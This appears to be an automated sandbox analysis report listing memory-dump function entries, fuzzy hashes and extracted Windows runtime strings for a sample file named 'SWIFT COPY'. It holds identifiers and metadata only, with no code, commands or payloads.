                                                                                              • Instruction ID: e6312e1e1f62b24c229e3c281e9c12e022921ee065d5d18d5a5b77e5690fd078
                                                                                              • Opcode Fuzzy Hash: 4f1e11fe5a6cdd0a2e37309049e9dbd426758fddc791bad4662865342816b90b
                                                                                              • Instruction Fuzzy Hash: 12614B72E002199FDB25DFA8C880BAEBBB9FB44708F54407DE659EB291D731A940CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$MUI
                                                                                              • API String ID: 0-17815947
                                                                                              • Opcode ID: a8ea9fc1e6ed39d5eb5225508538c61770cc981c9454142bf9f2abbf19129c00
                                                                                              • Instruction ID: 90ce1db6a05d296824524148fff73c00959961e953f93cc4efb4d193f015fb0f
                                                                                              • Opcode Fuzzy Hash: a8ea9fc1e6ed39d5eb5225508538c61770cc981c9454142bf9f2abbf19129c00
                                                                                              • Instruction Fuzzy Hash: 9C512972D0021DAFDF11DFA9DC80EEEBBB9EB48758F100529E611B7690D6349E45CB60
                                                                                              Strings
                                                                                              • kLsE, xrefs: 01330540
                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0133063D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                              • API String ID: 0-2547482624
                                                                                              • Opcode ID: ccb54d9b587da38fe5bf8510a54e41db9f98e2227efdbee6c017c84c28ba79f1
                                                                                              • Instruction ID: b7dbef1717377194ff03d4015a26c0e082994221c6706da4c764210d38207f61
                                                                                              • Opcode Fuzzy Hash: ccb54d9b587da38fe5bf8510a54e41db9f98e2227efdbee6c017c84c28ba79f1
                                                                                              • Instruction Fuzzy Hash: 2551BE715047468BD729DF68C4806A7BBE4EFC4318F10493EFAEA87281E770D545CB9A
                                                                                              Strings
                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0133A309
                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0133A2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                              • API String ID: 0-2876891731
                                                                                              • Opcode ID: 69fbc2ec54019ad08d93f5fa5efb0455049da495750a25d4b43785a1adec04e3
                                                                                              • Instruction ID: e6e246797233d4cb8900e7f750f6161d7f431e39dd9773de2265f6329f52f28f
                                                                                              • Opcode Fuzzy Hash: 69fbc2ec54019ad08d93f5fa5efb0455049da495750a25d4b43785a1adec04e3
                                                                                              • Instruction Fuzzy Hash: 4041E131A04A59DBDB16CF5DC880BAE7BF8FF85318F1440A9E940DB6A1E3B5D900CB44
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                              • API String ID: 2994545307-4008356553
                                                                                              • Opcode ID: 7b030a7fa01cbe2bf54c599713b5df05fd101bd1c5fce2328af8cc0712e76814
                                                                                              • Instruction ID: 2db062f222d59b3f9ee8dcbec1307a0a4f18ba83da6a482bd149da975f770103
                                                                                              • Opcode Fuzzy Hash: 7b030a7fa01cbe2bf54c599713b5df05fd101bd1c5fce2328af8cc0712e76814
                                                                                              • Instruction Fuzzy Hash: 9B01DCB2250744AFD322DF28CD49B2677E8E784B29F01C939EA58C7694E334E804CB56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MUI
                                                                                              • API String ID: 0-1339004836
                                                                                              • Opcode ID: 4013a880ffc1117b0214ea02df373e2f15548003144dbbc594312eaee09fffcc
                                                                                              • Instruction ID: 7abdac17202b739cd2f51e197e274a0335c86c8f24e46db2a3fd97fa3c33a65b
                                                                                              • Opcode Fuzzy Hash: 4013a880ffc1117b0214ea02df373e2f15548003144dbbc594312eaee09fffcc
                                                                                              • Instruction Fuzzy Hash: CC826C75E002188FEB25CFA9C8807EDBBB5BF84718F14816AE959BB351D7309D41CB58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 06c19900f2f5774e47ae6fdf6dfe9ff7c16e85d9c088479ce985816e86156ea2
                                                                                              • Instruction ID: 6d9da7a7396be6a4556e7da99e52366a41570c5d7342be9ede1c2eeaaf36373c
                                                                                              • Opcode Fuzzy Hash: 06c19900f2f5774e47ae6fdf6dfe9ff7c16e85d9c088479ce985816e86156ea2
                                                                                              • Instruction Fuzzy Hash: B19141B2A41219AFEB21DF99CD85FEE7BB8EF14B54F104055F700AB591E674AD00CB60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: bee676aabc72859fdce7c20f36e5eeb3d5facbda7ece1749f23e56cb6983e035
                                                                                              • Instruction ID: d5245b40b92d52c95a94137734b70f3b4b964d8f7876e8270efd31178ca10157
                                                                                              • Opcode Fuzzy Hash: bee676aabc72859fdce7c20f36e5eeb3d5facbda7ece1749f23e56cb6983e035
                                                                                              • Instruction Fuzzy Hash: 45918172A00559BFDB22AFA9EC44FAFBFB9EF45758F100029F505AB250DB74A901CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GlobalTags
                                                                                              • API String ID: 0-1106856819
                                                                                              • Opcode ID: 2d9e3323c0a5153075da81cdd419dd9920bf88e4a528ad3b23cf892a734aff6f
                                                                                              • Instruction ID: cf49dd9fb46f523a52e9bc2204c02a86cfccd02596ce44d7146b7fb428d60cc2
                                                                                              • Opcode Fuzzy Hash: 2d9e3323c0a5153075da81cdd419dd9920bf88e4a528ad3b23cf892a734aff6f
                                                                                              • Instruction Fuzzy Hash: 03717CB5E0021ACFDF28CF9CD591AADBFB5FF88718F58812AE905A7245E7319841CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .mui
                                                                                              • API String ID: 0-1199573805
                                                                                              • Opcode ID: 5eaf73017e946f939c29c897de8b20c5dd054a650267106b7b5fb615001e8293
                                                                                              • Instruction ID: b0f52a01d695df19d3661dcf9bd3a4cb775cfd68d8452611b957eacd0e4ef779
                                                                                              • Opcode Fuzzy Hash: 5eaf73017e946f939c29c897de8b20c5dd054a650267106b7b5fb615001e8293
                                                                                              • Instruction Fuzzy Hash: 64519373D0022A9BDF11DF9DE840AAEBBB8BF14A18F054129E911BB650D7349D05CBE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EXT-
                                                                                              • API String ID: 0-1948896318
                                                                                              • Opcode ID: db0c976a2c6de662250e9bf82bab3b0d0e85e4c65359fe6d4011aee185220c4b
                                                                                              • Instruction ID: b6657a8d99605a7093be70e5163e6fc5b6ac31f9b5e8f30c8f95b6d077ef5c65
                                                                                              • Opcode Fuzzy Hash: db0c976a2c6de662250e9bf82bab3b0d0e85e4c65359fe6d4011aee185220c4b
                                                                                              • Instruction Fuzzy Hash: 3A4140725083529BD721DB79C980B6BBBD8BF8872CF440D3DFA84D7180E678E9048796
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryHash
                                                                                              • API String ID: 0-2202222882
                                                                                              • Opcode ID: df173dc4d1c3b82c3677306ef12d6d879e5116ddcb024aac65f491d970739fe4
                                                                                              • Instruction ID: 38e0d20140f1b4d91fe60d725e692aa191acafe458d18e8381705d59da352644
                                                                                              • Opcode Fuzzy Hash: df173dc4d1c3b82c3677306ef12d6d879e5116ddcb024aac65f491d970739fe4
                                                                                              • Instruction Fuzzy Hash: C44142B1D0012DAADB21DB54CC84FDEBB7CEB45728F4045A5EA08AB140DB749E898FA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: 8717353030f5cfa85e35dbb539de07badcc1f39910407e31d6ff37aeef282625
                                                                                              • Instruction ID: 5165505b19a0af96f0314bc40adbe9c41eea5d779628bc69645ae7c2264d08fa
                                                                                              • Opcode Fuzzy Hash: 8717353030f5cfa85e35dbb539de07badcc1f39910407e31d6ff37aeef282625
                                                                                              • Instruction Fuzzy Hash: 2D310571A006199BEF32DB6DC851BEEBBA8DF45B08F14806CE941AB382D775EC05CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryName
                                                                                              • API String ID: 0-215506332
                                                                                              • Opcode ID: d5c102de0d95d5900060111adc01449fd4096aa2be6251436210f74e4ac27f10
                                                                                              • Instruction ID: 969a60b60bbe3d51a6118f18a5cc3788affa5fb9888da7bb91672a547c7a8f45
                                                                                              • Opcode Fuzzy Hash: d5c102de0d95d5900060111adc01449fd4096aa2be6251436210f74e4ac27f10
                                                                                              • Instruction Fuzzy Hash: 6D313636D00519AFEB19DB5CC851EBFBBB8EF80728F414129E915A7250D731AE04DBE0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `,
                                                                                              • API String ID: 0-3251075597
                                                                                              • Opcode ID: 298836cecd62b9371a8c6cd7b1f7c14af8166d2261958a104852f70e74ca77df
                                                                                              • Instruction ID: bc385a3d774443473b6ff1797267ac0aac67065018ea320ade0681d248c8ff18
                                                                                              • Opcode Fuzzy Hash: 298836cecd62b9371a8c6cd7b1f7c14af8166d2261958a104852f70e74ca77df
                                                                                              • Instruction Fuzzy Hash: 53218071900129DBCF25DF69C881AFEB7F4FF48744B500069F941AB250E738AD42CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `,
                                                                                              • API String ID: 0-3251075597
                                                                                              • Opcode ID: f8f00f3526578644c0389c515714786efffe18f78ef80a8212d3bfd6820ec821
                                                                                              • Instruction ID: 379db643414013b796ad240c75b6e23818bbfb0cd4cd7d3db0288476f1040ce5
                                                                                              • Opcode Fuzzy Hash: f8f00f3526578644c0389c515714786efffe18f78ef80a8212d3bfd6820ec821
                                                                                              • Instruction Fuzzy Hash: 8B21E9B1E00219ABDB24DFAAD9809EEFBF8FF98604F10012FE505A7250D7749981CB54
                                                                                              Strings
                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013B895E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                              • API String ID: 0-702105204
                                                                                              • Opcode ID: 79eb50f03235bd8190de325b060d53c6fa41067f425b6a7ddbeb365a9a0bee20
                                                                                              • Instruction ID: b43757f868461a76479d0ae2ac02057d7593c35192b310521256b5f102695751
                                                                                              • Opcode Fuzzy Hash: 79eb50f03235bd8190de325b060d53c6fa41067f425b6a7ddbeb365a9a0bee20
                                                                                              • Instruction Fuzzy Hash: 1701F7312002219BEB346F59D8C4BE67B6DEF8265CB44046DF7411AD65DF30A881CBA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 584975035c230977ab89ae6a179f25772f9e57db28ec275768577169a3f146d0
                                                                                              • Instruction ID: f0cb5605385d5b5ef37c581922a80ffb6e6081ec1bf1c0c44d8b396fed41f9c9
                                                                                              • Opcode Fuzzy Hash: 584975035c230977ab89ae6a179f25772f9e57db28ec275768577169a3f146d0
                                                                                              • Instruction Fuzzy Hash: 3C42D1336083419FEB25CF68D891B6BBBE5BF88308F48492DFA8697250D771D845CB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cbfe81049e4b2b90e725f9e6530b7674fa570738975dab7294256dd33bb4dcca
                                                                                              • Instruction ID: 70589e51fec4c27ea041ca1a14c2b98b037aeabb12fb1cf38335d0e8b123bfd0
                                                                                              • Opcode Fuzzy Hash: cbfe81049e4b2b90e725f9e6530b7674fa570738975dab7294256dd33bb4dcca
                                                                                              • Instruction Fuzzy Hash: 03424A75A002199FEB24CF69C881BADBBF5BF48714F1480DDE949AB242D734AE85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 588f7c362027b58fc7ffb4f7f66c636558ff9b3a632cedac73bf2d67bf2a3140
                                                                                              • Instruction ID: 50177502f40231bd30c816b8aab2223c8174080460ccc23c3b24f44fd74b6e51
                                                                                              • Opcode Fuzzy Hash: 588f7c362027b58fc7ffb4f7f66c636558ff9b3a632cedac73bf2d67bf2a3140
                                                                                              • Instruction Fuzzy Hash: EC32FFB0A057598FEF25CF69C845BBEBBF6BF84308F14411DE486AB684D735A841CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e982f87094d702d05e9f859c7ed61651c6a6013b00c2882cad308e1795cf66c3
                                                                                              • Instruction ID: c0e0c177d7df0e64d8cd63d15898dd372f0e442c9ed9023d59941ae314159585
                                                                                              • Opcode Fuzzy Hash: e982f87094d702d05e9f859c7ed61651c6a6013b00c2882cad308e1795cf66c3
                                                                                              • Instruction Fuzzy Hash: 7E220372204665CFEB25CF2DE290372BBF1BF44308F08845AE9968F686D775E552CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edddb819f96dd1b973e173f23c867055740f63310beb53b7d0930512963a8d9f
                                                                                              • Instruction ID: e2eaa28d5ad82cb8a44d0d275db31e8cdb24560b048e2e34f767f71a7b02f69d
                                                                                              • Opcode Fuzzy Hash: edddb819f96dd1b973e173f23c867055740f63310beb53b7d0930512963a8d9f
                                                                                              • Instruction Fuzzy Hash: 4032EEB0A00209DFDF25CF69C480BAABBF1FF88318F144569E95AAB791D730E941CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                              • Instruction ID: 595c49247351eced4a991cbeb73ae824838b1259b3b875528688aae03e5428bd
                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                              • Instruction Fuzzy Hash: 09F18171E0021A9BDF59CF99D580FAEBBF5AF48B18F048129ED05AB345E774E881CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d3a614deee7650a8997507c355c5b94778693d7aca76669d02dd7ff2f234c3a
                                                                                              • Instruction ID: a4c1e5c13234ff9480bee2c42fc046da7d448afe796d7934d48fa2b96dab181f
                                                                                              • Opcode Fuzzy Hash: 0d3a614deee7650a8997507c355c5b94778693d7aca76669d02dd7ff2f234c3a
                                                                                              • Instruction Fuzzy Hash: 6ED1F171A0061A9BDF15CF6CC841AFEB7F5AF88B08F1881ADD955A7241D735EE01CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b80bd7be658c1c76d388cbcc872886d72baceb5e61f1147d990053756fe76cd
                                                                                              • Instruction ID: f8193c7d7031b5422e076482acbb0cfb58da4f13d6685510e63f86a557cfd2dc
                                                                                              • Opcode Fuzzy Hash: 8b80bd7be658c1c76d388cbcc872886d72baceb5e61f1147d990053756fe76cd
                                                                                              • Instruction Fuzzy Hash: 3CE19FB1508342DFC715CF28C090A6ABBE0FFC9318F458A6DE9959B351DB31EA05CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd131b5eb8b69b51e19f2a6eef9e07ad3160aa5eb7ba9fa8897240030f885c09
                                                                                              • Instruction ID: 222496c2f9043421e83f710152a710a34a7ba2541adec3d2d7352242a2c73995
                                                                                              • Opcode Fuzzy Hash: fd131b5eb8b69b51e19f2a6eef9e07ad3160aa5eb7ba9fa8897240030f885c09
                                                                                              • Instruction Fuzzy Hash: 50D1E071A0032BDBDB14EF28C880ABAB7E5BF5431CF144669E916DB684E734E951CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                              • Instruction ID: 2750b90b6381ad5799921e41504b3859088f535d05e48cb981383e344fb075cf
                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                              • Instruction Fuzzy Hash: 16B15574A016059FDB24DF59C980EEBBBBDFF84308F14449DAB429BB95EA34E905CB10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                              • Instruction ID: a366fd71b25172498b72da2877640f50032658da2cc2da821e06da617dbc8fd0
                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                              • Instruction Fuzzy Hash: 02B10431704646EFDF26DBA8C950BBEBBFAEF44208F144199E6529B381D730E941CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d66dbc2994ebfe410fea846e95691dec95bac65c5972922f5697228fa3c67d5b
                                                                                              • Instruction ID: 3051b17c9235b2f945c1fc39257f1391240d577f1355e8b49fd1a444c0090417
                                                                                              • Opcode Fuzzy Hash: d66dbc2994ebfe410fea846e95691dec95bac65c5972922f5697228fa3c67d5b
                                                                                              • Instruction Fuzzy Hash: 8FC15870508381CFEB64CF19C494BABB7E4BF88308F44496DE98997291D774EA08CF92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc8eeca6985e8de9d5ce0431ed5502fe88830700ab920d035f16df4aa1d5ccc1
                                                                                              • Instruction ID: a4c5fa3a318426cc1edf60dab40d59150b9c0ef138e2c4e111c5c8019e7bf80a
                                                                                              • Opcode Fuzzy Hash: fc8eeca6985e8de9d5ce0431ed5502fe88830700ab920d035f16df4aa1d5ccc1
                                                                                              • Instruction Fuzzy Hash: 76B18370A0026A8BDB74EF59C890BADB7F5EF44708F1485EAD50AE7241EB70DD85CB20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd15b3cfb0190a952396def0cacda07172eb2df5292973a511cd51281c62dc7f
                                                                                              • Instruction ID: 3d8600d0ee803104fff3f8727ac42362ed465a09e94cd73b4f5b0bbf36bc0c6f
                                                                                              • Opcode Fuzzy Hash: fd15b3cfb0190a952396def0cacda07172eb2df5292973a511cd51281c62dc7f
                                                                                              • Instruction Fuzzy Hash: 94A10631E006599FEF21DF5CC844FAEBFA8AB05B5CF054125EE50AB291D778AE40CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb3712264d74e3dc747a72acfdbf9c4fe0a2342fc4f9bdee96401befa71c90fa
                                                                                              • Instruction ID: 3b1451063ea993249d9044d455b8a9a05aebeede07998b170325a21fff78e57e
                                                                                              • Opcode Fuzzy Hash: eb3712264d74e3dc747a72acfdbf9c4fe0a2342fc4f9bdee96401befa71c90fa
                                                                                              • Instruction Fuzzy Hash: CAA1B071B0061ADBEB39CF69C590BAAB7F5FF5532CF044029EA45A7291DB38E801CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 87a49b83a0f413fea1b4eaf4ed44c7c4c90e7c2cacb7f334ca68850b5c5bbdfd
                                                                                              • Instruction ID: 136c79b2b69804f4e7b97acbc0f37e4417a58cce2a0c911e7adbca25b6bbdfa0
                                                                                              • Opcode Fuzzy Hash: 87a49b83a0f413fea1b4eaf4ed44c7c4c90e7c2cacb7f334ca68850b5c5bbdfd
                                                                                              • Instruction Fuzzy Hash: F8A1BE72600611DFC722DF19C980B6AB7E9FF48718F49093AEA49977A1D334ED41CB91
                                                                                              Memory Dump Source
